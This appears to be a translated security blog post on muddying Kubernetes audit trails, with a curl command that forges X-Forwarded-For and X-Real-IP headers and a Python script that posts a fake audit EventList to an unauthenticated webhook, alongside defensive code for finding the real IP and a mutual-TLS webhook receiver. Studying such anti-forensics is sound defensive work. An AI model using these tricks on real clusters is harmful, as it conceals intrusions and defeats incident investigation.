长亭百川云 (Chaitin Baichuan Cloud)

Can a compromised k8s cluster really be traced back to the attacker?

lufei


2024-08-20


1. Introduction

I have recently been working on defensive strategies for k8s. Looking at it from an attacker's point of view, I found that k8s logs can be muddied to raise the cost of tracing an attack on the defender's side.

2. Obfuscating the source IP

2.1 Two headers that can be forged

k8s logs record the IPs carried in two headers: X-Forwarded-For and X-Real-IP.

Here the X-Forwarded-For header is forged (X-Forwarded-For is a comma-separated list of addresses):

curl --cert /root/.minikube/profiles/minikube/client.crt --key /root/.minikube/profiles/minikube/client.key -X GET https://192.168.49.2:8443/api/v1/pods -k -H 'User-Agent: ' -H 'X-Forwarded-For: 192.168.49.1192.168.49.2192.168.49.3192.168.49.4192.168.49.5192.168.49.6192.168.49.7192.168.49.8192.168.49.9192.168.49.10192.168.49.11192.168.49.12192.168.49.13192.168.49.14192.168.49.15192.168.49.17192.168.49.18192.168.49.19192.168.49.20192.168.49.21192.168.49.22192.168.49.23192.168.49.24192.168.49.25192.168.49.26192.168.49.27192.168.49.28192.168.49.29192.168.49.30192.168.49.31192.168.49.32192.168.49.33192.168.49.34192.168.49.35192.168.49.36192.168.49.37192.168.49.38192.168.49.39192.168.49.40192.168.49.41192.168.49.42192.168.49.43192.168.49.44192.168.49.45192.168.49.46192.168.49.47192.168.49.48192.168.49.49192.168.49.50192.168.49.51192.168.49.52192.168.49.53192.168.49.54192.168.49.55192.168.49.56192.168.49.57192.168.49.58192.168.49.59192.168.49.60192.168.49.61192.168.49.62192.168.49.63192.168.49.64192.168.49.65192.168.49.66192.168.49.67192.168.49.68192.168.49.69192.168.49.70192.168.49.71192.168.49.72192.168.49.73192.168.49.74192.168.49.75192.168.49.76192.168.49.77192.168.49.78192.168.49.79192.168.49.80192.168.49.81192.168.49.82192.168.49.83192.168.49.84192.168.49.85192.168.49.86192.168.49.87192.168.49.88192.168.49.89192.168.49.90192.168.49.91192.168.49.92192.168.49.93192.168.49.94192.168.49.95192.168.49.96192.168.49.97192.168.49.98192.168.49.99192.168.49.100192.168.49.101192.168.49.102192.168.49.103192.168.49.104192.168.49.105192.168.49.106192.168.49.107192.168.49.108192.168.49.109192.168.49.110192.168.49.111192.168.49.112192.168.49.113192.168.49.114192.168.49.115192.168.49.116192.168.49.117192.168.49.118192.168.49.119192.168.49.120192.168.49.121192.168.49.122192.168.49.123192.168.49.124192.168.49.125192.168.49.126192.168.49.127192.168.49.128192.168.49.129192.168.49.130192.168.49.131192.168.49.132192.168.49.133192.168.49.134192.168.49.135192.168.49.136192.168.49.137192.168.49.138192.168.49.139192.168.49.140192.168.49.141192.168.49.142192.168.49.143192.168.49.144192.168.49.145192.168.49.146192.168.49.147192.168.49.148192.168.49.149192.168.49.150192.168.49.151192.168.49.152192.168.49.153192.168.49.154192.168.49.155192.168.49.156192.168.49.157192.168.49.158192.168.49.159192.168.49.160192.168.49.161192.168.49.162192.168.49.163192.168.49.164192.168.49.165192.168.49.166192.168.49.167192.168.49.168192.168.49.169192.168.49.170192.168.49.171192.168.49.172192.168.49.173192.168.49.174192.168.49.175192.168.49.176192.168.49.177192.168.49.178192.168.49.179192.168.49.180192.168.49.181192.168.49.182192.168.49.183192.168.49.184192.168.49.185192.168.49.186192.168.49.187192.168.49.188192.168.49.189192.168.49.190192.168.49.191192.168.49.192192.168.49.193192.168.49.194192.168.49.195192.168.49.196192.168.49.197192.168.49.198192.168.49.199192.168.49.200192.168.49.201192.168.49.202192.168.49.203192.168.49.204192.168.49.205192.168.49.206192.168.49.207192.168.49.208192.168.49.209192.168.49.210192.168.49.211192.168.49.212192.168.49.213192.168.49.214192.168.49.215192.168.49.216192.168.49.217192.168.49.218192.168.49.219192.168.49.220192.168.49.221192.168.49.222192.168.49.223192.168.49.224192.168.49.225192.168.49.226192.168.49.227192.168.49.228192.168.49.229192.168.49.230192.168.49.231192.168.49.232192.168.49.233192.168.49.234192.168.49.235192.168.49.236192.168.49.237192.168.49.238192.168.49.239192.168.49.240192.168.49.241192.168.49.242192.168.49.243192.168.49.244192.168.49.245192.168.49.246192.168.49.247192.168.49.248192.168.49.249192.168.49.250192.168.49.251192.168.49.252192.168.49.253192.168.49.254'

Here X-Real-IP is forged, but only a single IP can be forged this way:

curl --cert /root/.minikube/profiles/minikube/client.crt --key /root/.minikube/profiles/minikube/client.key -X GET https://192.168.49.2:8443/api/v1/pods -k -H 'User-Agent: ' -H 'X-Real-IP: 192.168.49.2'

2.2 How to handle it?

The k8s log still records the real IP, and the real IP is always the last entry (at first I assumed the IPs would be sorted; I tried changing the addresses and it made no difference), so the defender only needs to look at the last IP.
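As an added illustration (not code from the post), the following Python models the behaviour the post reports and shows the defender-side extraction. model_source_ips is a simplified model of how the audit sourceIPs list is assembled (an assumption for illustration, not the apiserver's own code); client_ip walks the list from the right and steps past only proxies you operate, which also covers the case where a load balancer sits in front of the apiserver so that the last entry is the proxy rather than the client; the sample event and all addresses are constructed.

```python
import ipaddress

def parse_ip(text):
    """Normalised IP string, or None when text is not a valid address."""
    try:
        return str(ipaddress.ip_address(text.strip().strip("[]")))
    except ValueError:
        return None

def model_source_ips(headers, remote_addr):
    """Simplified model (an assumption for illustration, not the apiserver's code)
    of how the audit 'sourceIPs' list is built, as the post observed: every valid
    X-Forwarded-For entry, then X-Real-IP, then the TCP peer address always last."""
    ips = [ip for ip in map(parse_ip, headers.get("X-Forwarded-For", "").split(","))
           if ip is not None]
    real_ip = parse_ip(headers.get("X-Real-IP", ""))
    if real_ip is not None:
        ips.append(real_ip)
    peer = parse_ip(remote_addr) or parse_ip(remote_addr.rsplit(":", 1)[0])
    if peer is not None:
        ips.append(peer)
    return ips

def client_ip(event, trusted_proxies=frozenset()):
    """Walk sourceIPs from the right. The last entry is the peer the apiserver itself
    accepted the connection from; if that peer is a proxy you operate (a load balancer
    in front of the apiserver), step left past it. Nothing left of the first untrusted
    entry is believed, however long the spoofed list is."""
    for ip in reversed(event.get("sourceIPs") or []):
        if ip not in trusted_proxies:
            return ip
    return None

def header_spoofing_indicators(event, expected_hops=1):
    """Cheap triage signals for the trick in the post, evaluated on one audit event."""
    ips = event.get("sourceIPs") or []
    findings = []
    if len(ips) > expected_hops:
        findings.append(f"{len(ips)} source IPs, expected at most {expected_hops}")
    if len(set(ips)) != len(ips):
        findings.append("duplicate addresses in sourceIPs")
    if not event.get("userAgent"):   # the post's curl command sends an empty User-Agent
        findings.append("empty userAgent")
    return findings

# Constructed sample event, shaped like the EventList item shown later in the post.
SAMPLE_EVENT = {"auditID": "00000000-0000-4000-8000-000000000001", "verb": "list",
                "requestURI": "/api/v1/pods", "userAgent": "",
                "sourceIPs": ["192.168.49.1", "192.168.49.2", "192.168.49.3", "10.244.0.89"]}
```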

3. Submitting fake logs to the audit webhook

3.1 The webhook address has no authentication

Enterprises usually run a single internal k8s platform and usually also configure one shared audit webhook address; that is where the log muddying can be done.

By dumping the packets sent to the webhook, the format turned out to be as follows.

If the intrusion is discovered, fake events in this format can be released as a smokescreen to confuse the analysis.

import requests

# Audit EventList in the format observed on the wire (see above); the webhook
# receiver accepts it without any authentication.
test_str = """
{
   "kind": "EventList",
   "apiVersion": "audit.k8s.io/v1",
   "metadata": {},
   "items": [
      {
         "level": "Metadata",
         "auditID": "415774d8-93ed-489c-a1ae-47fe6a501d37",
         "stage": "RequestReceived",
         "requestURI": "/api/v1/configmaps",
         "verb": "list",
         "user": {
            "username": "system:serviceaccount:default:lufeitest3",
            "uid": "178c3130-6925-4d81-8ce4-5d1cd61fd7f1",
            "groups": [
                "system:serviceaccount:default",
                "system:authenticated"
            ],
            "extra": {
               "authentication.kubernetes.io/credential-id": [
                  "JTI=53561be6-c4c0-4cbe-9552-cf149868ce19"
               ],
               "authentication.kubernetes.io/node-name": [
                  "minikube"
               ],
               "authentication.kubernetes.io/node-uid": [
                  "1338157d-fe1d-445e-8700-60fb8eab6b34"
               ],
               "authentication.kubernetes.io/pod-name": [
                  "agones-controller-6b7f66b857-57ffx"
               ],
               "authentication.kubernetes.io/pod-uid": [
                  "2506dfe0-8283-45c0-9507-1ff0cc686e87"
               ]
            }
         },
         "sourceIPs": [
            "10.244.0.89"
         ],
         "userAgent": "curl",
         "objectRef": {
            "resource": "leases",
            "namespace": "default",
            "name": "agones-controller-lock",
            "apiGroup": "coordination.k8s.io",
            "apiVersion": "v1"
         },
         "requestReceivedTimestamp": "2024-08-02T09:57:28.634829Z",
         "stageTimestamp": "2024-08-02T09:57:28.634829Z"
      }
   ]
}
"""

# The webhook receiver is assumed to listen on http://127.0.0.1/ in this test setup.
rsp = requests.post("http://127.0.0.1/", data=test_str,
                    headers={'Content-Type': 'application/json'})
print(rsp.text)

3.2 How to handle it?

1. Randomize the path in the webhook URL so that the attacker cannot learn the address.

2. A member of the group said mutual (two-way) TLS verification can be used; I have not tried it yet.
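As an added example (not from the post), here is a minimal Python receiver that implements both points at once: an unguessable path and mutual TLS, which the apiserver can satisfy because its --audit-webhook-config-file is a kubeconfig that may carry a client certificate and key. The PKI file names, the port and how the generated path is distributed are assumptions, and the EventLists checked by the validator are constructed.

```python
import http.server
import json
import secrets
import ssl

# Unguessable path (deployment assumption: the same value is written into the server
# URL of the apiserver's --audit-webhook-config-file kubeconfig).
WEBHOOK_PATH = "/audit/" + secrets.token_urlsafe(32)
VALID_STAGES = {"RequestReceived", "ResponseStarted", "ResponseComplete", "Panic"}

def validate_event_list(body):
    """Structural checks on a posted audit EventList. Returns (ok, detail)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False, "body is not JSON"
    if not isinstance(doc, dict) or doc.get("kind") != "EventList" \
            or doc.get("apiVersion") != "audit.k8s.io/v1" or not isinstance(doc.get("items"), list):
        return False, "not an audit.k8s.io/v1 EventList"
    for ev in doc["items"]:
        if not isinstance(ev, dict) or not isinstance(ev.get("auditID"), str) \
                or ev.get("stage") not in VALID_STAGES:
            return False, "item without auditID or with unknown stage"
    return True, f"{len(doc['items'])} events"

class AuditHandler(http.server.BaseHTTPRequestHandler):
    def do_POST(self):
        if self.path != WEBHOOK_PATH:   # wrong path: plain 404, reveal nothing
            self.send_error(404)
            return
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        ok, detail = validate_event_list(body)
        if not ok:
            self.send_error(400, detail)
            return
        subject = self.connection.getpeercert().get("subject")  # filled by the mTLS handshake
        self.log_message("accepted %s from client cert %s", detail, subject)
        self.send_response(200)
        self.end_headers()

def serve(ca_file, cert_file, key_file, port=8443):
    """Mutual TLS: only clients whose certificate chains to ca_file pass the
    handshake (the apiserver presents the client cert from its webhook kubeconfig)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(cert_file, key_file)
    ctx.load_verify_locations(cafile=ca_file)
    ctx.verify_mode = ssl.CERT_REQUIRED
    httpd = http.server.HTTPServer(("0.0.0.0", port), AuditHandler)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()

if __name__ == "__main__":   # placeholder PKI file names
    serve("ca.pem", "server.pem", "server-key.pem")
```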

4. Summary

The two small tricks above raise the cost for the defender of analysing and tracing an attack. A real-world case from a while ago was quite interesting: going from outside the k8s environment to k8s node privileges, and from there to cluster privileges. I will share it when I have time :)

